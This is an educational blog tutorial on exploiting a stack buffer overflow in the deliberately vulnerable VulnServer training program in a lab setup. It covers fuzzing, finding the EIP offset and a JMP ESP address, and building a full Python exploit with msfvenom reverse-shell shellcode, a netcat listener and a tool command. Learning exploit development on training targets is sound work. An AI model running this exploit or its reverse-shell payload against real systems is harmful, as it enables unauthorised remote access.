A buffer overflow occurs when a program writes more input data than the memory allocated for it can hold. The excess data spills into adjacent memory, and it's often possible to exploit this in unintended ways.
Using the 'VulnServer' program we'll demonstrate a basic stack overflow and construct a script to perform remote code execution to gain a shell on a sample system.
Word of Warning
The purpose of this blog is to provide an outlet to note down the methodologies and tricks I've learned along the way, and hopefully this will be beneficial to someone else. I do not claim to be an expert in this field, and there are many other blog posts and articles that delve into considerably better detail.
Information is free - take the good bits and leave the rest!
Set up a Development System
I've used a 32 bit version of Windows Vista as a testbed for exploit development. Personally, I prefer to use Immunity Debugger rather than OllyDbg, but each to their own. They're very similar and each has its own supplemental toolset.
It's worth having the Mona scripts installed when using Immunity, mostly as a time-saving exercise. There are manual and semi-automated methods of doing the same things, but the Mona scripts are invaluable in some cases.
Disable the Windows firewall as it'll just be a nightmare trying to debug a reverse or bind shell if you've left it on.
Run the Debugger and Attach the Process
Nothing difficult here: just run the 'vulnserver.exe' program, then in the debugger navigate to 'File', click on 'Attach' and find the program somewhere in the list. In some cases you can just open the program directly from the debugger instead.
Once that's done, you'll notice that the program has halted/failed to open.
Just hit run a couple of times to get things going.
Access the Server and Basic Enumeration
Next, we can do a port scan to identify any publicly accessible services, but I'll just save you some time and state that the VulnServer port is 9999. Netcat to it and you'll have an interactive prompt.
Our first step will be to simply interact with the server and see what sort of functionality there is. Doing so will show some interaction in the debugger, but this is intentional. I'll run the HELP command as we're kindly prompted to do so.
There are a load of options here, each with a gradient of difficulty. As this blog is focusing on the basics, we'll target one that I know is vulnerable to an entry-level overflow (TRUN). I've input some parameters after the TRUN command, and the response is 'TRUN COMPLETE'.
Now, we could attempt to identify an overflow completely manually, but this would be extremely arduous. I'll write a quick Python script that'll interact with the server to automate this slightly.
#!/usr/bin/env python
import socket

target = "192.168.111.4"
port = 9999
prefix = b"TRUN ./"       # command sent ahead of the buffer (bytes, so send() works on Python 3)
buffer = b"A" * 100       # 100 x 0x41

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
print(sock.recv(1024))    # server banner
sock.send(prefix + buffer)
print(sock.recv(1024))    # server response
sock.close()
This script imports the Python socket module, sets a variable for the command we're sending, and then creates a buffer variable. We'll initially set the buffer to 100 A characters (0x41 in hex). We can increase this manually after each run (assuming that the program didn't crash), or we can loop, increasing the size and sending the buffer string each time.
We'll send this initial buffer of 100 bytes, but the program remains operational, as we can see from the 'TRUN COMPLETE' response.
Also, the debugger is still running, which is a bit of a giveaway.
I'll save us both some time by skipping further Python examples: I wrote a quick, rudimentary fuzzer for these sorts of things, which I'll use going forward. After running this with the required parameters, the fuzzer will loop over the buffer increase.
Eventually it will spit out a rough estimate of which lengths crashed the server. This shows that it's between 2100 and 2200 bytes.
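If you'd rather not use a ready-made tool, the loop described above can be sketched in a few lines. This is only a minimal illustration and not the fuzzer I used: the names `send_trun` and `fuzz`, the step size, and the timeout are all assumptions, and a missing or empty reply is simply treated as "the server has probably crashed".

```python
import socket


def send_trun(target, port, payload, timeout=5.0):
    """Send one TRUN request; return True if the server answered."""
    try:
        with socket.create_connection((target, port), timeout=timeout) as sock:
            sock.recv(1024)                      # read the banner
            sock.sendall(b"TRUN ./" + payload)   # same prefix as the script above
            return bool(sock.recv(1024))         # empty reply: peer closed on us
    except OSError:                              # refused, reset, or timed out
        return False


def fuzz(send, start=100, stop=3000, step=100):
    """Grow the buffer until `send` reports a failure.

    Returns (last_size_that_worked, first_size_that_failed); the second
    value is None if nothing failed within the range.
    """
    last_ok = None
    for size in range(start, stop + 1, step):
        if not send(b"A" * size):
            return last_ok, size
        last_ok = size
    return last_ok, None


# Hypothetical usage against the lab target from this post:
# print(fuzz(lambda payload: send_trun("192.168.111.4", 9999, payload)))
```

Keeping the transport (`send_trun`) separate from the loop (`fuzz`) means the same loop can be pointed at a different command just by swapping the sender.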
Looking at the debugger, which is now paused, we can see that a few registers contain our A (0x41) characters. Most importantly, the EIP (Extended Instruction Pointer) register has been overwritten, which allows us to directly control execution flow.
Right-clicking on the ESP (Stack Pointer) register value and then 'Follow in Dump' shows the memory address it points to and the values currently stored there: a long run of our A characters.
Initial Buffer Offset
The next step is to identify the exact number of characters that takes us to the EIP register. Taking direct control of EIP like this isn't always feasible on more modern systems, where mitigations such as DEP and ASLR (among other things) get in the way, but as this is a simple overflow vulnerability this will be all it takes for us to introduce our exploit shellcode.
To do this, the simplest way is to send a unique string of characters as the buffer string and then identify which characters are stored in EIP. There are probably dozens of tools out there, with the most common being the 'pattern_create' tool within the Metasploit Framework. However, I've again built one in to WoollyMammoth.
After sending the offset string, we can see that the debugger has paused again and the EIP register contains a hex string. To the upper-right there's an excerpt of the unique string pattern that was sent, which is now stored in the registers. Copy the EIP register value to the clipboard, paste it in to your tool of choice, and you'll see the offset position for the initial buffer, which will take us up to the EIP register. The 4 bytes that follow this offset land in EIP, so that is where we need to handle further execution flow.
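For the curious, the idea behind these pattern tools is simple enough to sketch. The following is a rough Python approximation of a Metasploit-style cyclic pattern (Aa0Aa1Aa2...) and the matching offset lookup. It is not the WoollyMammoth or Metasploit implementation, and the function names and the default length of 3000 are my own assumptions. Note that the debugger displays EIP as a little-endian value, so the bytes are reversed before searching.

```python
import itertools
import string


def pattern_create(length):
    """Build a cyclic pattern of upper/lower/digit triplets: Aa0Aa1Aa2..."""
    chunks = []
    for upper, lower, digit in itertools.product(
            string.ascii_uppercase, string.ascii_lowercase, string.digits):
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(eip_value, length=3000):
    """Return the offset of the EIP value (hex string, as shown in the
    debugger) within the pattern, or -1 if it isn't found."""
    needle = bytes.fromhex(eip_value)[::-1]   # undo the little-endian display
    return pattern_create(length).find(needle)
```

Send `pattern_create(3000)` in place of the A characters, copy the EIP value from the debugger, and pass it to `pattern_offset` as a hex string without the `0x` prefix.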
Execution flow control
Once we have our buffer offset, we can modify the original Python script (yes, I've built something in to WoollyMammoth, but ignore that for now) to account for this.
#!/usr/bin/env python
import socket

target = "192.168.111.4"
port = 9999
prefix = b"TRUN ./"
buffer = b"A" * 2005      # padding up to the saved return address (EIP)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
print(sock.recv(1024))    # server banner
sock.send(prefix + buffer)
print(sock.recv(1024))    # server response
sock.close()
I've set the buffer as 2005 * A characters, which then needs to be followed by the address of an instruction that will let us execute our shellcode. As this is a 32-bit process, this will be a 4-byte value (8 hex digits), which we'll need to find either within the 'vulnserver.exe' program or in an associated module that is loaded alongside it and is executable.
The type of instructions that we're looking to find are JMP ESP, CALL ESP, or possibly PUSH ESP, RET. Each of these transfers execution to the memory address held in the ESP register. At the point of the crash ESP points to the data immediately after the overwritten return address, which is where we'll place the shellcode.
As the 'essfunc.dll' library comes packaged as a requirement to run the vulnserver program, we can look in there. Click the 'Executable Modules' icon and then double-click on the 'essfunc.dll' library.
This loads the view of the module within the debugger.
Right-click in the CPU view window (top-left) and then Search For > Command (or just hit Ctrl + F). Enter the JMP ESP instruction to identify a valid instruction that we can use.
Mona can be used to automate this with the command !mona find -s "\xff\xe4" -m "essfunc.dll" (using the opcodes for JMP ESP) or !mona jmp -r esp -m "essfunc.dll" for the instructions directly. The output of Mona is also useful for identifying any protections that may be in place (ASLR, etc).
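At its core, an opcode search like this is just a scan for the byte pair FF E4 (JMP ESP) in the module's memory. A minimal sketch of that idea follows. It is not how Mona is implemented (Mona also checks module protections and more), and `find_opcode`, the sample bytes and the base address are purely illustrative assumptions.

```python
def find_opcode(data, opcode=b"\xff\xe4", base=0):
    """Return the address of every occurrence of `opcode` in `data`,
    where `base` is the address at which `data` is loaded."""
    hits = []
    pos = data.find(opcode)
    while pos != -1:
        hits.append(base + pos)
        pos = data.find(opcode, pos + 1)
    return hits


# Made-up bytes standing in for a chunk of a loaded module
sample = b"\x90\x90\xff\xe4\xc3\x55\xff\xe4"
addresses = find_opcode(sample, base=0x10000000)
print([hex(a) for a in addresses])
```

Any address found this way still needs checking by hand: it has to sit in executable memory, and it shouldn't contain bytes (such as nulls) that the vulnerable command would mangle.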
After identifying a valid JMP instruction we can modify the Python script to incorporate this address, which will be written to the EIP register.
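#!/usr/bin/env python
import socket

target = "192.168.111.4"
port = 9999
prefix = b"TRUN ./"
jmp = b"\xaf\x11\x50\x62"         # 0x625011AF (JMP ESP), written little-endian
buffer = (b"A" * 2005) + jmp      # padding, then the value that lands in EIP

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
print(sock.recv(1024))            # server banner
sock.send(prefix + buffer)
print(sock.recv(1024))            # server response (may never arrive once EIP is hijacked)
sock.close()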
The bytes of the memory address have to be written in reverse order (without reversing the hex digits inside each byte) because the x86 architecture is little-endian, meaning the least-significant byte is stored first. The address 0x625011AF therefore becomes \xaf\x11\x50\x62.
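Rather than reversing the bytes by hand, Python's standard `struct` module can do the packing. A small sketch, where the helper name `pack_address` is my own and the address is the one taken from the `jmp` variable in the script above:

```python
import struct


def pack_address(address):
    """Pack a 32-bit address as 4 bytes, least-significant byte first."""
    return struct.pack("<I", address)   # "<" = little-endian, "I" = unsigned 32-bit


# Produces the same four bytes as the hand-written "\xaf\x11\x50\x62"
jmp = pack_address(0x625011AF)
```

This avoids transposition mistakes when you're swapping addresses in and out while testing.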
Now we have our 2005 * A characters, which take us up to the buffer offset. These are followed by the address that overwrites the EIP register, so that execution continues at the JMP ESP instruction, which in turn will execute the shellcode at the ESP memory address.
I'll create shellcode for a basic reverse TCP shell using the following 'msfvenom' command and will add this to the Python script, placing it after the JMP ESP 'jmp' variable:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.5 LPORT=4444 -f python -v sc -b '\x00' EXITFUNC=none
Note - I've specified -b '\x00' to avoid null-byte characters in the shellcode, as a null byte would end the string early and truncate the payload.
In the Python script I've also included the \x90 character 20 times. This is a no-operation (NOP) instruction, which essentially does nothing. I've added it to ensure that the shellcode (which is automatically encoded by msfvenom) has space to decode itself.
#!/usr/bin/env python
import socket

target = "192.168.111.4"
port = 9999
prefix = b"TRUN ./"
jmp = b"\xaf\x11\x50\x62"         # 0x625011AF (JMP ESP), written little-endian

# msfvenom windows/shell_reverse_tcp output (encoded, no null bytes)
sc = (
    b"\xdb\xcb\xb8\x83\x5e\xf1\xf4\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
    b"\x52\x83\xc3\x04\x31\x43\x13\x03\xc0\x4d\x13\x01\x3a\x99\x51"
    b"\xea\xc2\x5a\x36\x62\x27\x6b\x76\x10\x2c\xdc\x46\x52\x60\xd1"
    b"\x2d\x36\x90\x62\x43\x9f\x97\xc3\xee\xf9\x96\xd4\x43\x39\xb9"
    b"\x56\x9e\x6e\x19\x66\x51\x63\x58\xaf\x8c\x8e\x08\x78\xda\x3d"
    b"\xbc\x0d\x96\xfd\x37\x5d\x36\x86\xa4\x16\x39\xa7\x7b\x2c\x60"
    b"\x67\x7a\xe1\x18\x2e\x64\xe6\x25\xf8\x1f\xdc\xd2\xfb\xc9\x2c"
    b"\x1a\x57\x34\x81\xe9\xa9\x71\x26\x12\xdc\x8b\x54\xaf\xe7\x48"
    b"\x26\x6b\x6d\x4a\x80\xf8\xd5\xb6\x30\x2c\x83\x3d\x3e\x99\xc7"
    b"\x19\x23\x1c\x0b\x12\x5f\x95\xaa\xf4\xe9\xed\x88\xd0\xb2\xb6"
    b"\xb1\x41\x1f\x18\xcd\x91\xc0\xc5\x6b\xda\xed\x12\x06\x81\x79"
    b"\xd6\x2b\x39\x7a\x70\x3b\x4a\x48\xdf\x97\xc4\xe0\xa8\x31\x13"
    b"\x06\x83\x86\x8b\xf9\x2c\xf7\x82\x3d\x78\xa7\xbc\x94\x01\x2c"
    b"\x3c\x18\xd4\xe3\x6c\xb6\x87\x43\xdc\x76\x78\x2c\x36\x79\xa7"
    b"\x4c\x39\x53\xc0\xe7\xc0\x34\x2f\x5f\xa5\xc1\xc7\xa2\x39\xdb"
    b"\x4b\x2a\xdf\xb1\x63\x7a\x48\x2e\x1d\x27\x02\xcf\xe2\xfd\x6f"
    b"\xcf\x69\xf2\x90\x9e\x99\x7f\x82\x77\x6a\xca\xf8\xde\x75\xe0"
    b"\x94\xbd\xe4\x6f\x64\xcb\x14\x38\x33\x9c\xeb\x31\xd1\x30\x55"
    b"\xe8\xc7\xc8\x03\xd3\x43\x17\xf0\xda\x4a\xda\x4c\xf9\x5c\x22"
    b"\x4c\x45\x08\xfa\x1b\x13\xe6\xbc\xf5\xd5\x50\x17\xa9\xbf\x34"
    b"\xee\x81\x7f\x42\xef\xcf\x09\xaa\x5e\xa6\x4f\xd5\x6f\x2e\x58"
    b"\xae\x8d\xce\xa7\x65\x16\xfe\xed\x27\x3f\x97\xab\xb2\x7d\xfa"
    b"\x4b\x69\x41\x03\xc8\x9b\x3a\xf0\xd0\xee\x3f\xbc\x56\x03\x32"
    b"\xad\x32\x23\xe1\xce\x16"
)

# padding up to EIP, JMP ESP address, 20 NOPs, then the shellcode
buffer = (b"A" * 2005) + jmp + (b"\x90" * 20) + sc

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
print(sock.recv(1024))            # server banner
sock.send(prefix + buffer)
print(sock.recv(1024))            # may block once the shellcode takes over
sock.close()
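To make the layout of the final buffer explicit, here is a small helper that assembles the pieces in order and sanity-checks them first. Treat it as a sketch under my own assumptions rather than a definitive implementation: `build_payload` is a made-up name, and the four \xcc bytes are only a placeholder standing in for the real shellcode.

```python
def build_payload(offset, ret, shellcode, nops=20, prefix=b"TRUN ./"):
    """Assemble: prefix | padding up to EIP | return address | NOPs | shellcode."""
    if len(ret) != 4:
        raise ValueError("return address must be exactly 4 bytes on 32-bit x86")
    body = b"A" * offset + ret + b"\x90" * nops + shellcode
    if b"\x00" in body:
        raise ValueError("payload contains a null byte")
    return prefix + body


placeholder = b"\xcc" * 4   # stand-in for the msfvenom shellcode
payload = build_payload(2005, b"\xaf\x11\x50\x62", placeholder)

# Where each piece sits within the buffer that follows the prefix
start = len(b"TRUN ./")
print("return address:", payload[start + 2005:start + 2009])
print("first NOP at offset:", 2009)
print("shellcode at offset:", 2009 + 20)
```

The null-byte check mirrors the -b '\x00' option passed to msfvenom, so a bad address or a hand-edited payload gets caught before it is sent.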
Stepping Through Execution
To get a clear understanding of what is happening, we'll step through the execution flow of the exploit in action. To do this, click the 'Go To Expression' icon and enter the address of the JMP ESP instruction that we identified earlier.
Set a breakpoint by pressing the F2 key when highlighting the address, which will stop the execution flow at this point.
Next, press F7 once (or the step-into icon) and you'll arrive at the initial NOP that was set following our jmp variable in the Python script.
Continue stepping through until the last NOP and you'll notice that not much of anything happens. I encourage you to set up a netcat listener (nc -nvlp 4444) at this point; if you're like me, you'll have forgotten to on both attempts at trying to get a screenshot.
Upon continuing to step through (should you choose to), the shellcode that was injected will start to decode itself in memory. By default, msfvenom uses the shikata_ga_nai encoder (where it feasibly can), and the real payload executes once this decoding has finished.
Reaping the Rewards
Once full execution flow is resumed we're presented with a nice command line shell to the Windows system.
As mentioned, I built a basic overflow (buffer offset + shellcode) feature in to WoollyMammoth:
woollymammoth.py exploit --prefix "TRUN ./" -o 2005 -e "\xaf\x11\x50\x62" -t 192.168.111.4 -p 9999 -n 20 --shellcode "<INLINE SHELLCODE>"